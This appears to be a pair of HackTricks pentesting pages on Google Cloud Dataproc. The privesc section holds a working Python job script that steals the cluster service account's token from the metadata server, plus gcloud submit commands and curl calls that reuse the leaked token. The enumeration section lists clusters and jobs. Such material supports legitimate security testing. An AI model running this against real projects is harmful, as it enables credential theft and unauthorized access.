# GCP Dataproc Privilege Escalation
{{#include ../../../banners/hacktricks-training.md}}
## Dataproc
{{#ref}}
../gcp-services/gcp-dataproc-enum.md
{{#endref}}
### `dataproc.clusters.get`, `dataproc.clusters.use`, `dataproc.jobs.create`, `dataproc.jobs.get`, `dataproc.jobs.list`, `storage.objects.create`, `storage.objects.get`
It wasn't possible to get a reverse shell using this technique, however it is possible to leak the SA token from the metadata endpoint following the steps described below.
#### Exploitation Steps
- Upload the job script to a GCP bucket.
- Submit the job to the Dataproc cluster.
- Use the job to reach the metadata server.
- Leak the token of the service account used by the cluster.
```python
import requests

# Dataproc nodes are GCE VMs, so the job can query the instance metadata server
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
headers = {"Metadata-Flavor": "Google"}

def fetch_metadata_token():
    try:
        # Request an access token for the cluster's service account
        response = requests.get(metadata_url, headers=headers, timeout=5)
        response.raise_for_status()
        token = response.json().get("access_token", "")
        # The token is printed so it ends up in the job driver output
        print(f"Leaked Token: {token}")
        return token
    except Exception as e:
        print(f"Error fetching metadata token: {e}")
        return None

if __name__ == "__main__":
    fetch_metadata_token()
```
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>
# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
```
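The leaked access token appears in the driver output that `gcloud dataproc jobs submit` streams back (it can also be fetched later with `gcloud dataproc jobs wait`). A minimal sketch of abusing it, assuming the token was copied from that output and `<project-id>` is the target project:
```bash
# Inspect the identity and scopes behind the leaked token
curl -s "https://oauth2.googleapis.com/tokeninfo?access_token=<leaked-token>"

# Use the token directly against GCP APIs, e.g. list the project's buckets
curl -s -H "Authorization: Bearer <leaked-token>" \
  "https://storage.googleapis.com/storage/v1/b?project=<project-id>"
```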
{{#include ../../../banners/hacktricks-training.md}}

# GCP - Dataproc Enum
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is mainly used for data processing, querying, machine learning, and stream analytics. Dataproc lets organizations easily create distributed compute clusters that integrate seamlessly with other Google Cloud Platform (GCP) services such as Cloud Storage, BigQuery, and Cloud Monitoring.
Dataproc clusters run on virtual machines (VMs), and the service account attached to these VMs determines the permissions and access level of the cluster.
## Components
A Dataproc cluster typically consists of:
- Master Node: manages cluster resources and coordinates distributed jobs.
- Worker Nodes: execute the distributed tasks.
- Service Accounts: handle API calls and access to other GCP services.
## Enumeration
Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information such as service accounts, permissions, and potential misconfigurations.
### Cluster Enumeration
To enumerate Dataproc clusters and get their details:
```bash
gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>
```
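The describe output contains the service account attached to the cluster VMs, which is the identity a submitted job can leak via the metadata server. A quick filter as a sketch (the `--format` path assumes the standard `config.gceClusterConfig` layout of the describe response):
```bash
# Extract just the service account (and its scopes) used by the cluster VMs
gcloud dataproc clusters describe <cluster-name> --region=<region> \
  --format="value(config.gceClusterConfig.serviceAccount, config.gceClusterConfig.serviceAccountScopes)"
```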
### Job Enumeration
```bash
gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>
```
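The driver output of existing jobs is also worth reviewing, since previous runs may already have printed secrets. A sketch of retrieving it (assuming `dataproc.jobs.get` on the target job):
```bash
# Re-stream the driver output of a job (finished or running)
gcloud dataproc jobs wait <job-id> --region=<region>
```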
### Privesc
{{#ref}}
../gcp-privilege-escalation/gcp-dataproc-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}